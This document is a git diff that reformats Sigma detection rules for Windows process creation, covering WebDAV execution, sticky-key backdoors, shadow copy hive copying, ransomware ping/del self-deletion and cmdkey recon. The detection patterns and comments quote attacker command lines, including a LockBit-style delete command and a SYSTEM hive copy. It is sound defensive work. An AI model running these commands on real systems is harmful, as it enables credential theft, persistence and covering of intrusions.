b/sigma/sysmon/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml index 4474f58a4..af8f9da1f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml @@ -1,9 +1,7 @@ title: Suspicious File Execution From Internet Hosted WebDav Share id: f0507c0f-a3a2-40f5-acc6-7f543c334993 status: test -description: Detects the execution of the "net use" command to mount a WebDAV server - and then immediately execute some content in it. As seen being used in malicious - LNK files +description: Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files references: - https://twitter.com/ShadowChasing1/status/1552595370961944576 - https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior @@ -22,15 +20,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|contains: \cmd.exe - - OriginalFileName: Cmd.EXE + - Image|contains: \cmd.exe + - OriginalFileName: Cmd.EXE selection_base: - CommandLine|contains|all: + CommandLine|contains|all: - ' net use http' - '& start /b ' - \DavWWWRoot\ selection_ext: - CommandLine|contains: + CommandLine|contains: - '.exe ' - '.dll ' - '.bat ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_no_space_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_no_space_execution.yml index d2991ab80..94451d78d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_no_space_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_no_space_execution.yml @@ -1,12 +1,9 @@ title: Cmd.EXE Missing Space Characters Execution Anomaly id: a16980c2-0c56-4de0-9a79-17971979efdd status: test -description: 'Detects Windows command lines that miss a space before or after the - /c flag when running a command using the cmd.exe. - +description: | + Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe. This could be a sign of obfuscation of a fat finger problem (typo by the developer). - - ' references: - https://twitter.com/cyb3rops/status/1562072617552678912 - https://ss64.com/nt/cmd.html @@ -24,19 +21,19 @@ detection: process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational - selection1: - CommandLine|contains: + selection1: # missing space before the /c + CommandLine|contains: - cmd.exe/c - - \cmd/c + - \cmd/c # just cmd/c would be prone to false positives - '"cmd/c' - cmd.exe/k - - \cmd/k + - \cmd/k # just cmd/k would be prone to false positives - '"cmd/k' - cmd.exe/r - - \cmd/r + - \cmd/r # just cmd/r would be prone to false positives - '"cmd/r' - selection2: - CommandLine|contains: + selection2: # special cases verified via Virustotal Enterprise search + CommandLine|contains: - /cwhoami - /cpowershell - /cschtasks @@ -47,8 +44,8 @@ detection: - /kschtasks - /kbitsadmin - /kcertutil - selection3: - CommandLine|contains: + selection3: # missing space after the /c + CommandLine|contains: - cmd.exe /c - cmd /c - cmd.exe /k @@ -56,7 +53,7 @@ detection: - cmd.exe /r - cmd /r filter_generic: - CommandLine|contains: + CommandLine|contains: - 'cmd.exe /c ' - 'cmd /c ' - 'cmd.exe /k ' @@ -64,9 +61,9 @@ detection: - 'cmd.exe /r ' - 'cmd /r ' filter_fp: - - CommandLine|contains: AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules - - CommandLine|endswith: cmd.exe/c . - - CommandLine: cmd.exe /c + - CommandLine|contains: AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules + - CommandLine|endswith: cmd.exe/c . + - CommandLine: cmd.exe /c condition: process_creation and (1 of selection* and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml index 5d05d7778..4b25e08a7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml @@ -1,9 +1,7 @@ title: NtdllPipe Like Activity Execution id: bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2 status: test -description: Detects command that type the content of ntdll.dll to a different file - or a pipe in order to evade AV / EDR detection. As seen being used in the POC - NtdllPipe +description: Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe references: - https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe author: Florian Roth (Nextron Systems) @@ -20,7 +18,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - type %windir%\system32\ntdll.dll - type %systemroot%\system32\ntdll.dll - type c:\windows\system32\ntdll.dll diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_path_traversal.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_path_traversal.yml index 76b9f5fe0..48cd6cafe 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_path_traversal.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_path_traversal.yml @@ -1,8 +1,7 @@ title: Potential CommandLine Path Traversal Via Cmd.EXE id: 087790e3-3287-436c-bccf-cbd0184a7db1 status: test -description: Detects potential path traversal attempt via cmd.exe. Could indicate - possible command/argument confusion/hijacking +description: Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking references: - https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/ - https://twitter.com/Oddvarmoe/status/1270633613449723905 @@ -21,23 +20,23 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - ParentImage|endswith: \cmd.exe - - Image|endswith: \cmd.exe - - OriginalFileName: cmd.exe + - ParentImage|endswith: \cmd.exe + - Image|endswith: \cmd.exe + - OriginalFileName: cmd.exe selection_flags: - - ParentCommandLine|contains: - - /c - - /k - - /r - - CommandLine|contains: - - /c - - /k - - /r + - ParentCommandLine|contains: + - /c + - /k + - /r + - CommandLine|contains: + - /c + - /k + - /r selection_path_traversal: - - ParentCommandLine: /../../ - - CommandLine|contains: /../../ + - ParentCommandLine: /../../ + - CommandLine|contains: /../../ filter_java: - CommandLine|contains: \Tasktop\keycloak\bin\/../../jre\bin\java + CommandLine|contains: \Tasktop\keycloak\bin\/../../jre\bin\java condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - Java tools are known to produce false-positive when loading libraries diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml index 39a52866e..9876118bb 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml @@ -1,8 +1,7 @@ title: Suspicious Ping/Copy Command Combination id: ded2b07a-d12f-4284-9b76-653e37b6c8b0 status: experimental -description: Detects uncommon one-liner command having ping and copy at the same time, - which is usually used by malware. +description: Detects uncommon one-liner command having ping and copy at the same time, which is usually used by malware. references: - Internal Research author: X__Junior (Nextron Systems) @@ -15,18 +14,19 @@ logsource: category: process_creation product: windows detection: + # Note: In the case of sysmon and similar logging utilities, see this discussion https://github.com/SigmaHQ/sigma/discussions/4277 process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cmd: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains: + CommandLine|contains: # Count - ' -n ' - ' /n ' - CommandLine|contains|all: - - ping + CommandLine|contains|all: + - ping # Covers "ping" and "ping.exe" - 'copy ' - ' /y ' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml index f5afe7bb4..c684b3edb 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml @@ -1,9 +1,7 @@ title: Suspicious Ping/Del Command Combination id: 54786ddc-5b8a-11ed-9b6a-0242ac120002 status: test -description: Detects a method often used by ransomware. Which combines the "ping" - to wait a couple of seconds and then "del" to delete the file in question. Its - used to hide the file responsible for the initial infection for example +description: Detects a method often used by ransomware. Which combines the "ping" to wait a couple of seconds and then "del" to delete the file in question. Its used to hide the file responsible for the initial infection for example references: - https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf @@ -20,24 +18,26 @@ logsource: category: process_creation product: windows detection: + # Note: In the case of sysmon and similar logging utilities, see this discussion https://github.com/SigmaHQ/sigma/discussions/4277 + # Example: "C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\Users\User\Desktop\lockbit\lockbit.exe" & Del /f /q "C:\Users\User\Desktop\lockbit\lockbit.exe". process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_count: - CommandLine|contains: + CommandLine|contains: - ' -n ' - ' /n ' selection_nul: - CommandLine|contains: Nul + CommandLine|contains: Nul # Covers "> Nul" and ">Nul " selection_del_param: - CommandLine|contains: + CommandLine|contains: - ' /f ' - ' -f ' - ' /q ' - ' -q ' selection_all: - CommandLine|contains|all: - - ping + CommandLine|contains|all: + - ping # Covers "ping" and "ping.exe" - 'del ' condition: process_creation and (all of selection_*) falsepositives: diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_redirect.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_redirect.yml index 9dc02a007..49ac6ae59 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_redirect.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_redirect.yml @@ -1,11 +1,10 @@ title: CMD Shell Output Redirect id: 4f4eaa9f-5ad4-410c-a4be-bc6132b0175a related: - - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 - type: similar + - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 + type: similar status: test -description: Detects the use of the redirection character ">" to redicrect information - in commandline +description: Detects the use of the redirection character ">" to redicrect information in commandline references: - https://ss64.com/nt/syntax-redirection.html author: frack113 @@ -23,18 +22,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cmd: - - OriginalFileName: Cmd.Exe - - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe selection_cli: - CommandLine|contains: '>' + CommandLine|contains: '>' filter_idm_extension: - CommandLine|contains: + CommandLine|contains: - C:\Program Files (x86)\Internet Download Manager\IDMMsgHost.exe - chrome-extension:// - \\.\pipe\chrome.nativeMessaging condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - Internet Download Manager extensions use named pipes and redirection via CLI. - Filter it out if you use it in your environment + - Internet Download Manager extensions use named pipes and redirection via CLI. Filter it out if you use it in your environment level: low ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml index 87f773d64..d1c24f568 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml @@ -1,13 +1,12 @@ title: Suspicious CMD Shell Output Redirect id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 related: - - id: aa2efee7-34dd-446e-8a37-40790a66efd7 - type: derived - - id: 4f4eaa9f-5ad4-410c-a4be-bc6132b0175a - type: similar + - id: aa2efee7-34dd-446e-8a37-40790a66efd7 + type: derived + - id: 4f4eaa9f-5ad4-410c-a4be-bc6132b0175a + type: similar status: experimental -description: Detects inline Windows shell commands redirecting output via the ">" - symbol to a suspicious location +description: Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location references: - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ author: Nasreddine Bencherchali (Nextron Systems) @@ -25,10 +24,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli_1: - CommandLine|contains: + CommandLine|contains: + # Add more suspicious locations as you find them + # The space from the start is missing to cover append operations ">>" - '> \Users\Public\' - '> %APPDATA%\' - '> %TEMP%\' @@ -46,16 +47,15 @@ detection: - '>C:\Users\Public\' - '>C:\Windows\Temp\' selection_cli_2: - CommandLine|contains: + CommandLine|contains: - ' >' - '">' - - '''>' - CommandLine|contains|all: + - "'>" + CommandLine|contains|all: - C:\Users\ - \AppData\Local\ condition: process_creation and (selection_img and 1 of selection_cli_*) falsepositives: - - Legitimate admin or third party scripts used for diagnostic collection might - generate some false positives + - Legitimate admin or third party scripts used for diagnostic collection might generate some false positives level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_rmdir_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_rmdir_execution.yml index 4bab2d854..30fd80791 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_rmdir_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_rmdir_execution.yml @@ -1,18 +1,11 @@ title: Directory Removal Via Rmdir id: 41ca393d-538c-408a-ac27-cf1e038be80c status: test -description: 'Detects execution of the builtin "rmdir" command in order to delete - directories. - +description: | + Detects execution of the builtin "rmdir" command in order to delete directories. Adversaries may delete files left behind by the actions of their intrusion activity. - - Malware, tools, or other non-native files dropped or created on a system by an - adversary may leave traces to indicate to what was done within a network and how. - - Removal of these files can occur during an intrusion, or as part of a post-intrusion - process to minimize the adversary''s footprint. - - ' + Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. + Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase @@ -31,12 +24,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_rmdir: - CommandLine|contains: rmdir + CommandLine|contains: rmdir selection_flags: - CommandLine|contains: + CommandLine|contains: - /s - /q condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_shadowcopy_access.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_shadowcopy_access.yml index 5e1818228..081b386e3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_shadowcopy_access.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_shadowcopy_access.yml @@ -1,8 +1,7 @@ title: Copy From VolumeShadowCopy Via Cmd.EXE id: c73124a7-3e89-44a3-bdc1-25fe4df754b1 status: test -description: Detects the execution of the builtin "copy" command that targets a shadow - copy (sometimes used to copy registry hives that are in use) +description: Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use) references: - https://twitter.com/vxunderground/status/1423336151860002816?s=20 - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection @@ -22,7 +21,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + # cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ + # There is an additional "\" to escape the special "?" + CommandLine|contains|all: - 'copy ' - \\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_stdin_redirect.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_stdin_redirect.yml index be5789c58..8861c8cf5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_stdin_redirect.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_stdin_redirect.yml @@ -1,8 +1,8 @@ title: Read Contents From Stdin Via Cmd.EXE id: 241e802a-b65e-484f-88cd-c2dc10f9206d related: - - id: 00a4bacd-6db4-46d5-9258-a7d5ebff4003 - type: obsoletes + - id: 00a4bacd-6db4-46d5-9258-a7d5ebff4003 + type: obsoletes status: test description: Detect the use of "<" to read and potentially execute a file via cmd.exe references: @@ -22,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cmd: - - OriginalFileName: Cmd.Exe - - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe selection_cli: - CommandLine|contains: < + CommandLine|contains: < condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml index c1ced524d..7b8d9ae26 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml @@ -1,12 +1,10 @@ title: Sticky Key Like Backdoor Execution id: 2fdefcb3-dbda-401e-ae23-f0db027628bc related: - - id: baca5663-583c-45f9-b5dc-ea96a22ce542 - type: derived + - id: baca5663-583c-45f9-b5dc-ea96a22ce542 + type: derived status: test -description: Detects the usage and installation of a backdoor that uses an option - to register a malicious debugger for built-in tools that are accessible in the - login screen +description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen references: - https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community @@ -38,7 +36,7 @@ detection: - \rundll32.exe - \wscript.exe - \wt.exe - CommandLine|contains: + CommandLine|contains: - sethc.exe - utilman.exe - osk.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml b/sigma/sysmon/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml index c1d637145..f6ad21742 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml @@ -1,13 +1,9 @@ title: Persistence Via Sticky Key Backdoor id: 1070db9a-3e5d-412e-8e7b-7183b616e1b3 status: test -description: 'By replacing the sticky keys executable with the local admins CMD executable, - an attacker is able to access a privileged windows console session without authenticating - to the system. - +description: | + By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system. When the sticky keys are "activated" the privilleged shell is launched. - - ' references: - https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html - https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf @@ -27,7 +23,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'copy ' - '/y ' - C:\windows\system32\cmd.exe C:\windows\system32\sethc.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml b/sigma/sysmon/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml index 60531dc57..586bf5148 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml @@ -1,8 +1,7 @@ title: New Generic Credentials Added Via Cmdkey.EXE id: b1ec66c6-f4d1-4b5c-96dd-af28ccae7727 status: test -description: Detects usage of cmdkey to add generic credentials. As an example, this - has to be used before connecting to an RDP session via command line interface. +description: Detects usage of cmdkey to add generic credentials. As an example, this has to be used before connecting to an RDP session via command line interface. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol author: frack113, Nasreddine Bencherchali (Nextron Systems) @@ -19,10 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmdkey.exe - - OriginalFileName: cmdkey.exe + - Image|endswith: \cmdkey.exe + - OriginalFileName: cmdkey.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' /g' - ' /u' - ' /p' diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmdkey_recon.yml b/sigma/sysmon/process_creation/proc_creation_win_cmdkey_recon.yml index 91bf1b40a..ccbfed558 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmdkey_recon.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmdkey_recon.yml @@ -6,8 +6,7 @@ references: - https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation - https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx - https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1003.005/T1003.005.md#atomic-test-1---cached-credential-dump-via-cmdkey -author: jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron - Systems) +author: jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) date: 2019/01/16 modified: 2023/02/03 tags: @@ -22,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmdkey.exe - - OriginalFileName: cmdkey.exe + - Image|endswith: \cmdkey.exe + - OriginalFileName: cmdkey.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /l' - ' -l' condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_cmstp_execution_by_creation.yml b/sigma/sysmon/process_creation/proc_creation_win_cmstp_execution_by_creation.yml index e58e26a21..c1d429eda 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_cmstp_execution_by_creation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_cmstp_execution_by_creation.yml @@ -1,8 +1,7 @@ title: CMSTP Execution Process Creation id: 7d4cdc5a-0076-40ca-aac8-f7e714570e47 status: stable -description: Detects various indicators of Microsoft Connection Manager Profile Installer - execution +description: Detects various indicators of Microsoft Connection Manager Profile Installer execution references: - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ author: Nik Seetharaman @@ -19,6 +18,7 @@ logsource: category: process_creation product: windows detection: + # CMSTP Spawning Child Process process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational diff --git a/sigma/sysmon/process_creation/proc_creation_win_conhost_legacy_option.yml b/sigma/sysmon/process_creation/proc_creation_win_conhost_legacy_option.yml index 19c625f54..45bd3e719 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_conhost_legacy_option.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_conhost_legacy_option.yml @@ -1,9 +1,7 @@ title: Suspicious High IntegrityLevel Conhost Legacy Option id: 3037d961-21e9-4732-b27a-637bcc7bf539 status: test -description: ForceV1 asks for information directly from the kernel space. Conhost - connects to the console application. High IntegrityLevel means the process is - running with elevated privileges, such as an Administrator context. +description: ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context. references: - https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29 - https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/ @@ -23,7 +21,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: IntegrityLevel: High - CommandLine|contains|all: + CommandLine|contains|all: - conhost.exe - '0xffffffff' - -ForceV1 diff --git a/sigma/sysmon/process_creation/proc_creation_win_conhost_path_traversal.yml b/sigma/sysmon/process_creation/proc_creation_win_conhost_path_traversal.yml index 4e694ba8c..d23223951 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_conhost_path_traversal.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_conhost_path_traversal.yml @@ -1,8 +1,7 @@ title: Conhost.exe CommandLine Path Traversal id: ee5e119b-1f75-4b34-add8-3be976961e39 status: test -description: detects the usage of path traversal in conhost.exe indicating possible - command/argument confusion/hijacking +description: detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking references: - https://pentestlab.blog/2020/07/06/indirect-command-execution/ author: Nasreddine Bencherchali (Nextron Systems) @@ -20,7 +19,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: ParentCommandLine|contains: conhost - CommandLine|contains: /../../ + CommandLine|contains: /../../ condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_conhost_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_conhost_susp_child_process.yml index 4b9203a86..8dfff3357 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_conhost_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_conhost_susp_child_process.yml @@ -1,8 +1,7 @@ title: Uncommon Child Process Of Conhost.EXE id: 7dc2dedd-7603-461a-bc13-15803d132355 status: experimental -description: Detects uncommon "conhost" child processes. This could be a sign of "conhost" - usage as a LOLBIN or potential process injection activity. +description: Detects uncommon "conhost" child processes. This could be a sign of "conhost" usage as a LOLBIN or potential process injection activity. references: - http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/ author: omkar72 @@ -24,13 +23,12 @@ detection: filter_main_conhost: Image|endswith: :\Windows\System32\conhost.exe filter_main_null: - Image: null + Image: filter_main_empty: Image: '' filter_optional_provider: - Provider_Name: SystemTraceProvider-Process - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + Provider_Name: SystemTraceProvider-Process # Race condition with SystemTrace doesn't provide all fields. + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_conhost_uncommon_parent.yml b/sigma/sysmon/process_creation/proc_creation_win_conhost_uncommon_parent.yml index 9639a39ca..33dc56ed3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_conhost_uncommon_parent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_conhost_uncommon_parent.yml @@ -1,9 +1,7 @@ title: Conhost Spawned By Uncommon Parent Process id: cbb9e3d1-2386-4e59-912e-62f1484f7a89 status: experimental -description: Detects when the Console Window Host (conhost.exe) process is spawned - by an uncommon parent process, which could be indicative of potential code injection - activity. +description: Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity. references: - https://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html author: Tim Rauch @@ -24,6 +22,9 @@ detection: Image|endswith: \conhost.exe ParentImage|endswith: - \explorer.exe + # - '\csrss.exe' # Legitimate parent as seen in EchoTrail https://www.echotrail.io/insights/search/csrss.exe + # - '\ctfmon.exe' # Seen several times in a testing environment + # - '\dllhost.exe' # FP on clean system from grandparent 'svchost.exe -k DcomLaunch -p' - \lsass.exe - \regsvr32.exe - \rundll32.exe @@ -32,6 +33,7 @@ detection: - \spoolsv.exe - \svchost.exe - \userinit.exe + # - '\wermgr.exe' # Legitimate parent as seen in EchoTrail https://www.echotrail.io/insights/search/wermgr.exe - \wininit.exe - \winlogon.exe filter_main_svchost: @@ -50,8 +52,7 @@ detection: ParentCommandLine|contains: - C:\Program Files (x86)\Dropbox\Client\ - C:\Program Files\Dropbox\Client\ - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_control_panel_item.yml b/sigma/sysmon/process_creation/proc_creation_win_control_panel_item.yml index aaaf6ed8b..bf60d8be9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_control_panel_item.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_control_panel_item.yml @@ -22,26 +22,25 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_reg_img: - - Image|endswith: \reg.exe - - OriginalFileName: reg.exe + - Image|endswith: \reg.exe + - OriginalFileName: reg.exe selection_reg_cli: - CommandLine|contains|all: + CommandLine|contains|all: - add - CurrentVersion\Control Panel\CPLs selection_cpl: - CommandLine|endswith: .cpl + CommandLine|endswith: .cpl filter_cpl_sys: - CommandLine|contains: + CommandLine|contains: - \System32\ - '%System%' - '|C:\Windows\system32|' filter_cpl_igfx: - CommandLine|contains|all: + CommandLine|contains|all: - 'regsvr32 ' - ' /s ' - igfxCPL.cpl - condition: process_creation and (all of selection_reg_* or (selection_cpl and - not 1 of filter_cpl_*)) + condition: process_creation and (all of selection_reg_* or (selection_cpl and not 1 of filter_cpl_*)) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_createdump_lolbin_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_createdump_lolbin_execution.yml index a773b0405..bba64e1cf 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_createdump_lolbin_execution.yml +++ 